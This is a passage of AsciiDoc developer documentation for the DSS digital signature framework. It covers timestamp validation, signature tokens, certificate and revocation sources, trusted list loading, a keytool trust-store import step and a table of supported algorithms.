PDF document;\n * `ASiCWithCAdESService` - creates a timestamped ASiC container with provided documents.\n\n[source,java,indent=0]\n.PDF timestamping\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/timestamp\/TimestampPDFTest.java[tags=creation]\n----\n\n=== Timestamp validation\n\nAs well as a single timestamp creation, DSS provides a validation service for timestamped documents. The timestamp validation process represents \"5.4 Time-stamp validation building block\" (cf. <<R09>>). The validation process is identical to <<signatureValidation>> process. An appropriate validator will be selected automatically. In total, DSS supports timestamp-alone validation for the following file formats:\n\n * Detached CMS timestamp (`DetachedTimestampValidator`) - a detached signed content must be provided (or its digest);\n * PDF document (`PDFDocumentValidator`);\n * ASiC CAdES container with a timestamp (`ASiCWithCAdESTimestampValidator`).\n\nThe validation process can be run with the following inputs :\n\n[source,java,indent=0]\n.Timestamped document validation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/timestamp\/TimestampPDFTest.java[tags=validation]\n----\n\nThe produced reports use the same structure as for <<signatureValidation>>.\n\n==== Timestamp qualification\n\nDSS is also able to determine a qualification level of a timestamp, if a relative information about TrustServiceProviders is provided to a certificate verifier (loaded automatically to a trusted certificate source with <<tlValidationJob>>) (cf. <<R14>>).\n\nThree qualification levels are supported by DSS and can be obtained :\n\n * `QTSA` (issued from a granted trust service with TSA\/QTST type at the timestamp production time);\n * `TSA` any other from a known trust anchor;\n * `N\/A` for others.\n\nAn example of a produced Detailed Report you can see below:\n\n.Timestamp Detailed Report\ninclude::_samples\/timestamp-detailed-report-example.adoc[]\n\n== Available implementations of DSSDocument\n\nDSS allows creation of different kinds of DSSDocument : \n\n * `InMemoryDocument` : fully loads in memory. This type of DSSDocument can be instantiated with an array of bytes, an InputStream,...\n * `FileDocument` : refers an existing File\n * `DigestDocument` : only contains pre-computed digest values for a given document. That allows a user to avoid sending the full document (detached signatures). \n \n[source,java,indent=0]\n.DigestDocument\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/DigestDocumentTest.java[tags=demo]\n----\n\n== Management of signature tokens\n\nThe DSS framework is able to create signatures from PKCS#11, PKCS#12 and MS CAPI. Java 6 is inherently capable of communicating with these kinds of KeyStores. To be independent of the signing media, DSS framework uses an interface named SignatureTokenConnection to manage different implementations of the signing process. The base implementation is able to sign a stream of the data in one step. That means that all the data to be signed needs to be sent to the SSCD. This is the case for MS CAPI. As to the PKCS#11 and PKCS#12, which give to the developer a finer control in the signature operation, the DSS framework implements the AsyncSignatureTokenConnection abstract class that permits to execute the digest operation and signature operation in two different threads or even two different hardwares.\n\nThis design permits also other card providers\/adopters to create own implementations. For example, this can be used for a direct connection to the Smartcard through Java 6 PC\/SC.\n\n=== PKCS#11\n\nPKCS#11 is widely used to access smart cards and HSMs. Most commercial software uses PKCS#11 to access the signature key of the CA or to enrol user certificates. In the DSS framework, this standard is encapsulated in the class Pkcs11SignatureToken.\n\n[source,java,indent=0]\n.Pkcs11SignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PKCS11Snippet.java[tags=demo]\n----\n\n=== PKCS#12\n \nThis standard defines a file format commonly used to store the private key and corresponding public key certificate protecting them by password. \n\nIn order to use this format with the DSS framework you have to go through the class Pkcs12SignatureToken. \n\n[source,java,indent=0]\n.Pkcs12SignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PKCS12Snippet.java[tags=demo]\n----\n \n=== MS CAPI\n\nIf the middleware for communicating with an SSDC provides a CSP based on MS CAPI specification, then to sign the documents you can use MSCAPISignatureToken class.\n\n[source,java,indent=0]\n.MSCAPISignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/MSCAPISnippet.java[tags=demo]\n----\n\n=== Other Implementations\n\nAs you can see, it is easy to add another implementation of the SignatureTokenConnection, thus enabling the framework to use other API than the provided three (PKCS#11, PKCS#12 and MS CAPI). For example, it is likely that in the future PC\/SC will be the preferred way of accessing a Smartcard. Although PKCS#11 is currently the most used API, DSS framework is extensible and can use PC\/SC. For our design example we propose to use PC\/SC to communicate with the Smartcard.\n\n== Management of certificates sources\n\nThe validation of a certificate requires the access to some other certificates from multiple sources like trusted lists, trust store, the signature itself: certificates can be contained inside or any other source. \nWithin the framework, an X509 certificate is wrapped through the class:\n\n * `eu.europa.esig.dss.model.x509.CertificateToken`\n \nThis encapsulation helps make certificate handling more suited to the needs of the validation in the context of trust. The framework associates two internal identifiers to the certificate : the DSS Id based on the certificate binary (unique for each certificate) and the Entity Id based on its public key (common to cross-signed certificates).\n\nCertificate tokens are grouped into sources. A certificate token can be declared in several sources. The class that models a source is called:\n\n * `eu.europa.esig.dss.spi.x509.CertificateSource`\n \nThis class stores all extracted\/injected certificates for a specific source (Signature, OCSP Response, Trust store, Trusted-list,...). All source types are specified in the enumeration : \n \n * `eu.europa.esig.dss.enumerations.CertificateSourceType`\n \nThis information is used, for example, to distinguish between the certificate from a trusted source and the others. A source has one and only one type, but a certificate token can be found in multiple sources. \nThe DSS framework supplies some standard implementations, but also gives the possibility to implement owner solutions. Among the standard solutions you can find:\n\n * `eu.europa.esig.dss.spi.x509.CommonCertificateSource`\n \nThis is the superclass of almost of the certificate sources. It stores the extracted certificates and implements the common methods from the `CertificateSource` to retrieve certificate(s) by subject, public key, subject key identifier (ski),...\n\nIt also exposes the method CommonCertificateSource#addCertificate which gives the possibility to add manually any CertificateToken as a part of this source.\n\n * `eu.europa.esig.dss.spi.x509.CommonTrustedCertificateSource`\n \nThe CommonTrustedCertificateSource is a certificate source for trusted certificates. All added certificates are marked as trust anchors and no revocation data are required for these certificates.\n\n * `eu.europa.esig.dss.validation.SignatureCertificateSource`\n \nThis class and its sub-classes are used to extract and collect certificates from signatures \/ timestamps. It also has methods to retrieve certificates \/ certificate references by their origin (eg : SigningCertificate attribute, DSS Dictionary,...).\n\n * `eu.europa.esig.dss.spi.tsl.TrustedListsCertificateSource`\n \nCertificates coming from the list of Trusted Lists. This class inherits of `CommonTrustedCertificateSource` and gives the mechanism to define the set of trusted certificates (trust anchors). They are used in the validation process to decide if the prospective certificate chain has a trust anchor. See chapter <<tlValidationJob>> to get more information about trusted lists loading (e.g. EU Trusted List).\n\n * `eu.europa.esig.dss.spi.x509.ListCertificateSource`\n \nThis class follows the composite design pattern with a list of CertificateSources. That's used in the validation to retrieve all sources from the signatures \/ timestamps \/ revocation data \/ trusted lists \/... It contains some methods which check over all sources to retrieve certificates or verify if a certificate is trusted.\n\n== Management of CRL and OCSP sources\n\nA CRL is a time-stamped list identifying revoked certificates. It is signed by a Certificate Authority (CA) and made freely available in a public repository. Each revoked certificate is identified in a CRL by its certificate serial number. \n\nThe Online Certificate Status Protocol (OCSP) is an Internet protocol used for obtaining the revocation status of an unique X.509 digital certificate. \n\nFor every certificate, the validity has to be checked via CRL or OCSP responses. The information may originate from different CRLSources or OCSPSources: \nFor easing the usage of such sources, DSS implements a CRLSource and OCSPSource interfaces (which inherit from RevocationSource), which offer a generic, uniform way of accessing CRL and OCSP sources. Furthermore, a caching mechanism can be easily attached to those sources, optimizing the access time to revocation information by reducing network connections to online servers.\n\nThe interface CRLSource defines the method which returns CRLToken for the given certificate\/issuer certificate couple:\n\n[source,java,indent=0]\n.CRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo]\n----\n\nThe interface OCSPSource defines the method which returns OCSPToken for the given certificate\/issuer certificate couple:\n\n[source,java,indent=0]\n.OCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo]\n----\n\nWe use these classes during the certificate validation process through \"validationContext\" object (based on ValidationContext class) which is a \"cache\" for one validation request that contains every object retrieved so far. This object in turn instantiates a \"verifier\" based on `RevocationDataLoadingStrategy` class whose role is to fetch revocation data by querying an OCSP or CRL source in the defined order and return the succeeded result.\nIn general, we can distinguish three main sources:\n\n * Offline sources (`OfflineRevocationSource`);\n * Online sources (`OnlineRevocationSource`);\n * Sources with the cache mechanism;\n * List of sources (`ListRevocationSource`) with a collection of several sources.\n \n=== Repository Revocation Source\n\nThe above-mentioned class allows caching of CRL and OCSP responses to a user-chosen source. By default DSS provides a JDBC based implementation for this class, but other implementations also can be created. The class contains a complete set of functions to save revocation data to a database, extract, update and remove it. +\nFurthermore, the `RepositoryRevocationSource` allows the implementer to define a backup revocation source, for the case if the database does not contains the certificate's revocation data yet. +\n\nList of cached Revocation sources implemented in DSS:\n\n * `JdbcRevocationSource`\n ** `JdbcCacheCRLSource`\n ** `JdbcCacheOCSPSource`\n\nThe classes allow the following configuration :\n\n[source,java,indent=0]\n.JdbcCacheCRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo-cached]\n----\n\nAnd an example for JdbcCacheOCSPSource :\n\n[source,java,indent=0]\n.JdbcCacheOCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo-cached]\n----\n\nBe aware that you have to initialize a table before start of working with the cached revocation repository.\n\n=== Other implementations of CRL and OCSP Sources\n\nSuch sources find the status of a certificate either from a list stored locally or using the information contained in the advanced signature or online way. Here is the list of sources already implemented in the DSS framework:\n\n * CRL sources\n ** `OfflineCRLSource` : This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. The code is common for all signature formats and CRL contents are injected by its sub-classes : \n *** `CMSCRLSource` : Extracts CRLs and CRL references from a CMS Signed Data :\n **** `CAdESCRLSource` : Sub-class of `CMSCRLSource` for a CAdES Signature;\n **** `TimestampCRLSource`: Sub-class of `CMSCRLSource` for a Timestamp token (RFC 3161);\n *** `PAdESCRLSource` : Extracts CRLs and CRL references from a PAdES signature.\n *** `XAdESCRLSource` : Extracts CRLs and CRL references from a XAdES signature.\n *** `ExternalResourcesCRLSource` : A class that can instantiate a list of certificate revocation lists from a directory where should be the individual lists.\n ** `OnlineCRLSource` : Retrieves CRL files from online sources with the CRL Distribution Points information from the certificate.\n ** `JdbcCacheCrlSource` : Implementation of the `JdbcRevocationSource`. This implementation allows storage of valid CRL entries to a defined `DataSource'` and retrieve them locally.\n\n * OCSP sources\n ** `OfflineOCSPSource` : This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. The code is common for all signature formats and OCSP responses are injected by its sub-classes : \n *** `CMSOCSPSource` : Extracts OCSP responses and OCSP references from a CMS Signed Data :\n **** `CAdESOCSPSource` : Sub-class of `CMSOCSPSource` for a CAdES Signature;\n **** `TimestampOCSPSource`: Sub-class of `CMSOCSPSource` for a Timestamp token (RFC 3161);\n *** `PAdESOCSPSource` : Extracts OCSP responses and OCSP references from a PAdES signature.\n *** `XAdESOCSPSource` : Extracts OCSP responses and OCSP references from a XAdES signature.\n **** `ExternalResourcesOCSPSource` : A class that can instantiate a list of OCSPToken from a directory where should be the individual DER Encoded X509 certificates files.\n ** `OnlineOCSPSource` : Retrieves OCSP responses from online source.\n ** `JdbcCacheOcspSource` : Implementation of the `JdbcRevocationSource`. This implementation allows storage of valid OCSP entries to a defined `DataSource` and retrieve them locally.\n\n==== Online CRL Source\n\nThis is a representation of an Online CRL repository. This implementation will contact using HTTP protocol the CRL Responder to download the CRLs from the given URI. Note that certificate\"s Authority Information Access (AIA) extension is used to find issuer's resources location like CRL file and\/or Online Certificate Status Protocol (OCSP). The URIs of CRL server will be extracted from this property (OID value: 1.3.6.1.5.5.7.48.1.3).\n\nIt allows the following configuration :\n\n[source,java,indent=0]\n.OnlineCRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo-online]\n----\n\n==== Online OCSP Source\n\nThis is a representation of an Online OCSP repository. This implementation will contact using HTTP protocol the OCSP Responder to retrieve the OCSP response. Note that certificate's Authority Information Access (AIA) extension is used to find issuer's resources location like CRT file and\/or Online Certificate Status Protocol (OCSP). The URIs of OCSP server will be extracted from this property (OID value: 1.3.6.1.5.5.7.48.1).\n\nIt allows the following configuration :\n\n[source,java,indent=0]\n.OnlineOCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo-online]\n----\n\n[[certificateVerifier]]\n== CertificateVerifier configuration\n\nThe CertificateVerifier and its implementation CommonCertificateVerifier determines how DSS accesses the external resources and how it should react in some occasions. This configuration is used in both extension and validation mode.\n\n[source,java,indent=0]\n.CertificateVerifier usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CertificateVerifierSnippet.java[tags=demo]\n----\n\n== Trust Anchor(s) configuration\n\nTrust anchors represent an important part in the signature creation \/ validation. That defines which are the trusted entities, which signatures can be trusted,... Do I trust certificates\/signatures from another company \/ country \/ ... ?\n\nSince the version 5.6, DSS allows to configure one or more trusted certificate source(s). These sources can be configured from a TrustStore (kind of keystore which only contains certificates), a trusted list and\/or a list of trusted lists.\n\n[source,java,indent=0]\n.Multiple trusted certificate sources usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=multi-trusted-certificate-sources]\n----\n\n=== Trust store initialization\n\nIf you have a collection of certificates to trust, the easier way to provide them to DSS it to use a KeyStore \/ TrustStore. \n\n[source,java,indent=0]\n.Trust anchor initialization from a Trust Store\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=trust-store]\n----\n\nTo generate the trust store, there's an utility class CreateKeyStoreApp in the dss-cookbook module.\n\n=== Trusted List Certificate Source \n\nIn several countries, a list of Trust Service Providers (TSP) is published. This list is usually published in a machine processable format (XML) and sometimes in a human-readable format (PDF). A standard (ETSI TS 119 612) exists with the specifications for the XML format. \n\nDSS contains all needed resources to download, parse, validate and interpret the trusted list contents. Since DSS 5.6, that's possible to configure one or more independent trusted list(s) (aka not linked to a list of trusted lists) and\/or one or more list of trusted lists.\n\nIf you want to collect your trusted certificates from trusted list(s), the TrustedListsCertificateSource is required. The trusted list(s) loading can require some times (connection time-out, xml parsing, xml validation,...). This process is usually executed in background. An instance of TrustedListsCertificateSource needs to be created. That will be synchronized with the TLValidationJob.\n\n[source,java,indent=0]\n.Trusted List Certificate Source \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=trusted-list-source]\n----\n\n[[tlValidationJob]]\n== TLValidationJob\n\nThe TLValidationJob allows to download, parse, validate the Trusted List(s) and Lists Of Trusted Lists (LOTL). Once the task is done, its result is stored in the TrustedListsCertificateSource. The job uses 3 different caches (download, parsing and validation) and a state-machine to be efficient. \n\nTrusted lists are stored on the file system. That offers the possibility to run in offline mode with the stored trusted lists. Trusted Lists can be loaded from the file system and\/or from Internet.\n \nIn the next sections the different configurations will be covered.\n\n=== TLSource and LOTLSource\n\nSeveral TLSources and several LOTLSources can be injected in a TLValidationJob. The only constraint is the uniqueness of the Trusted List URLs.\n\n[source,java,indent=0]\n.Multiple TLSources and multiple LOTLSources configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=job-config-sources]\n----\n\n==== Trusted List Source (TLSource)\n\nA TLSource allows to quickly setup a trusted list configuration. The URL and the signing certificates for this TL are mandatory. Optionally, predicates \/ filters can be configured to retrieve only a part of the trust service providers or trust services.\t\n\n[source,java,indent=0]\n.TLSource configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=french-tl-source]\n----\n\n==== List Of Trusted Lists Source (LOTLSource)\n\nA similar configuration is possible for Lists Of Trusted Lists (LOTL). That requires an URL and the possible LOTL signers. Some other parameters are possible. By default, all listed trusted lists are loaded.\n\n[source,java,indent=0]\n.LOTLSource configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=european-lotl-source]\n----\n\n=== DSSFileLoader\n\nThe FileCacheDataLoader is used to download the trusted list contents on the file-system. Two different configurations are needed. Both of them share the same folder : \n\n * offline refresh : disabled download from Internet and unlimited cache expiration \n * online refresh : enabled download from Internet and limited cache expiration\n \n[source,java,indent=0]\n.Offline and Online refresh configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=job-loaders]\n----\n\n=== The SynchronizationStrategy\n\nThe SynchronizationStrategy defines which are the trusted lists or list of trusted lists to be synchronized. By default, DSS synchronizes all of them. DSS don't reject any expired \/ invalid \/... trusted lists. The content is trusted and a warning is added in a signature \/ certificate validation.\n\nThe strategy is configurable via the interface SynchronizationStrategy :\n\n[source,java,indent=0]\n.Example of a custom SynchronizationStrategy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=custom-strategy]\n----\n\nDSS provides two implementations : ExpirationAndSignatureCheckStrategy and AcceptAllStrategy (default).\n\n=== The CacheCleaner\n\nThe CacheCleaner specifies how DSS clear the cache in case of expired URL,... 2 options are available : memory and file-system.\n\n[source,java,indent=0]\n.CacheCleaner Configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=cache-cleaner]\n----\n\n=== Alerting from TL Loading\n\nDSS allows running of custom alerts in some situations (eg : invalid TL signature, LOTL location change,...). Alert works with two concepts : detection and alert handler. After the download\/parsing\/validation and before the synchronization, the results are tested to detect events and launch alert(s).\n\n[source,java,indent=0]\n.Examples of Alerting\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=alerting]\n----\n\n=== Executor Service\n\nAn Executor Service parameter allows you to customize a way of the program execution on your Java machine, by configuring a number of possible threads to be running, await time and so on. \n\n[source,java,indent=0]\n.Executor Service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=executor-service]\n----\n\n=== Complete configuration for the European LOTL\n\nBelow, you can find a complete configuration for the European List Of Trusted Lists. The URLs need to be externalized.\n\n[source,java,indent=0]\n.European LOTL Configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/EuropeanLOTLSnippets.java[tags=complete-european-lotl-config]\n----\n\n=== The TL \/ LOTL refresh\n\nThe TL \/ LOTL loading in DSS works as below : \n\n * Download \/ parse \/ validate all LOTLSources from the configuration with\/without pivot support (multi-threaded)\n * Analyze introduced changes and expire cache entries (new TL URLs, new signing certificates for a TL,...)\n * Create TLSources from the retrieved LOTLs\n * Combine these TLSources with independent TLSources (from the configuration)\n * Download \/ parse \/ validate all TLs (multi-threaded)\n * If alerts are configured, test if an alert needs to be launched\n * If the debug is enabled, print in the log the cache status\n * Synchronize the TrustedListCertificateSource\n * If the cache cleaner is configured, execute it\n * If the debug is enabled, print in the log the cache status\n\nThe refresh can be called with the offline or the online loader and run exactly the same code\n\n[source,java,indent=0]\n.How to refresh the Trusted List(s) and Lists of Trusted Lists \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=refresh]\n----\n\n[[KeyStore]]\n==== Java Keystore Management\n\nGenerally (like in case of European LOTL) DSS downloads Trusted Lists by using the SSL protocol (for resources using HTTPS extension), that requires to have a certificate of a remote source in the Java trust store. The certificates have their own validity period and can expire. If a certificated is expired, it will be replaced on a server by a new one in order to support a secure SSL connection. The easiest way to know if your Java trust store is outdated and new certificates need to be added is to check your logs during a TLValidationJob update :\n\n[source]\n--\nERROR 14052 --- [pool-2-thread-30] e.e.e.dss.tsl.runnable.AbstractAnalysis : Unable to process GET call for url [https:\/\/sr.riik.ee\/tsl\/estonian-tsl.xml]. Reason : [PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target]\n--\n\nThe `SunCertPathBuilderException` means that the certificate established the secure connection is not trusted by your Java Virtual Machine. In order to add the certificate to the trust store, you need to do the following steps (the example is based on Windows OS and Google Chrome browser):\n\n . Open the failed URL in your browser. In our case it will be 'https:\/\/sr.riik.ee\/tsl\/estonian-tsl.xml' obtained from the logs.\n . Click on a lock icon next to the URL in the tab you just opened. It will open a window about the current connection status.\n . Click on 'Certificate' button to open the Certificate window.\n . Go to 'Details' tab and choose 'Copy to File...'.\n . Process the 'Certificate Export Wizard', by saving the certificate in one of '.CER' formats. Store the file in your file system. For us it will create a file 'ee.cer'.\n . Run 'Command Prompt' with administrator permissions (right click -> 'Run As Administrator').\n . Execute the following line (ensure that 'keytool' is installed) :\n\n.Certificate import\n[source,ruby]\n----\nkeytool -import -alias newCert -file pathToCert\\ee.cer -keystore pathToJavaDirectory\\lib\\security\\cacerts -storepass changeit\n----\n\nThe default password for a Java keystore is \"changeit\". Ensure that you have a default configuration, or use another password you have configured.\n\nNOTE: In order to apply changes, the application using Java must be rebooted.\n\nAfter these steps the `TLValidationJob` will successfully download the target Trusted List (i.e. Estonian in our example).\n\nNOTE: This described algorithm is not only one available solution, if you have difficulties with this, you can search in the Internet for another working for you solution.\n\n=== TLValidationJobSummary\n\nThe class TLValidationJobSummary contains all processed data about the download (time, error,...), the parsing (extracted information, parsing error,...) and the signature validation (signing certificate, signing time,...).\n\n[source,java,indent=0]\n.How to retrieve the information about the TLValidationJob process \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=tl-summary]\n----\n\n== TSP Sources\n\nThe Time Stamp Authority by creating time-stamp tokens provides independent and irrefutable proof of time for business transactions, e-documents and digital signatures. The TSA must comply with the IETF RFC 3161 specifications (cf. <<R08>>). A time-stamp is obtained by sending the digest value of the given data and digest algorithm to the Time Stamp Authority. The returned time-stamp is a signed data that contains the digest value, the identity of the TSA, and the time of stamping. This proves that the given data existed before the time of stamping.\nThe DSS framework proposes TSPSource interface to implement the communication with TSA. The class OnlineTSPSource is the default implementation of TSP using HTTP(S) communication layer.\nThe following bit of Java code illustrates how you might use this class:\n\n[source,java,indent=0]\n.OnlineTSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/OnlineTSPSourceTest.java[tags=demo]\n----\n\n=== Time-stamp policy\n\nA time-stamp policy is a \"named set of rules that indicates the applicability of a time-stamp token to a particular community and\/or class of application with common security requirements\". A TSA may define its own policy which enhances the policy defined in RFC 3628. Such a policy shall incorporate or further constrain the requirements identified in RFC 3628. A time-stamp policy may be defined by the user of times-stamp services.\n\n=== Composite TSP Source\n\nSometimes, timestamping servers may encounter interruptions (restart,...). To avoid failing signature extension, DSS allows a user to configure several TSP Sources. DSS will try source by source until getting an usable timestamp token. \n\n[source,java,indent=0]\n.Configuration of a CompositeTSPSource\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/CompositeTSPSourceTest.java[tags=demo]\n----\n\n== Supported algorithms\n\nDSS supports several signature algorithms (combination of an encryption algorithm and a digest algorithm). Below, you can find the supported combinations. The support of the algorithms depends on the registered OID (ASN1) or URI (XML).\n\nIn the next table, XAdES also applies to ASiC with embedded XAdES signatures and CAdES also concerns PAdES and ASiC with embedded CAdES signatures. \n\nNOTE: SmartCards\/HSMs don't allow signing with all digest algorithms. Please refer to your SmartCard\/HSM provider.\n\n[cols=\"13*^\"]\n.Supported algorithms\n|===\n| | SHA-1 | SHA-224 | SHA-256 | SHA-384 | SHA-512 | SHA3-224 | SHA3-256 | SHA3-384 | SHA3-512 | MD2 | MD5 | RIPEMD160\n\n13+|*RSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"]\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*RSA-PSS*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*ECDSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"]\n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*Ed25519*\n\n| XAdES | | | | | | | | | | | | \n\n| CAdES | | | | | icon:check-circle[role=\"lime\"] | | | | | | | \n\n13+|*DSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | | icon:check-circle[role=\"lime\"] | | | | | | | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | | | | | | | | | |\n\n13+|*HMAC*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n|===\n\n== Implementation management with ServiceLoader\n\nDSS incorporates modules that are loaded in the run time based on the chosen configuration and the input data via a https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader]. This provides a flexibility for an end-user to work only with selected modules and a possibility to expand DSS with custom implementations.\n\nIn order to provide a chosen implementation(s) to ServiceLoader, a file listing all the desired implementations should be created in the resource directory `META-INF\/services` with a name matching the implemented interface. When merging sources (e.g. creating a Fat JAR module), the files can be lost\/overwritten, and should be configured manually (all the required implementations shall be listed).\n\nNOTE: If a DSS module(s) implementing a required interface(s) is added to your project's dependency list, the implementation shall be loaded automatically.\n\nThe following modules are provided with independent implementations:\n\n * <<dssUtils>>;\n * <<dssCrlParser>>;\n * <<dssPades>>.\n \nAdditionally, DSS is able to choose the required implementation for the following interfaces:\n \n * `DocumentValidationFactory` - checks a provided signed file's format and loads a relevant validator;\n * `SignaturePolicyValidator` - checks a signature policy file and loads a relevant validator to be able to process the detected format.\n\nWARNING: If no appropriate available implementation is found, an exception will be thrown.\n\n=== Document Validation Factory\n\nThis factory is used to create a required instance of a `DocumentValidator` based on the provided file's format (signature or timestamp). An implementation shall process a file format check and load the related <<signedDocumentValidator>> implementation to be used for the file's validation.\n\nThe following implementations are present in DSS:\n\n * CMSDocumentValidatorFactory : loads CMSDocumentValidator, used for a CAdES validation (delivered in dss-cades module);\n * XMLDocumentValidatorFactory : loads XMLDocumentValidator, used for a XAdES validation (delivered in dss-xades module);\n * PDFDocumentValidatorFactory : loads PDFDocumentValidator, used for a PAdES validation (delivered in dss-pades 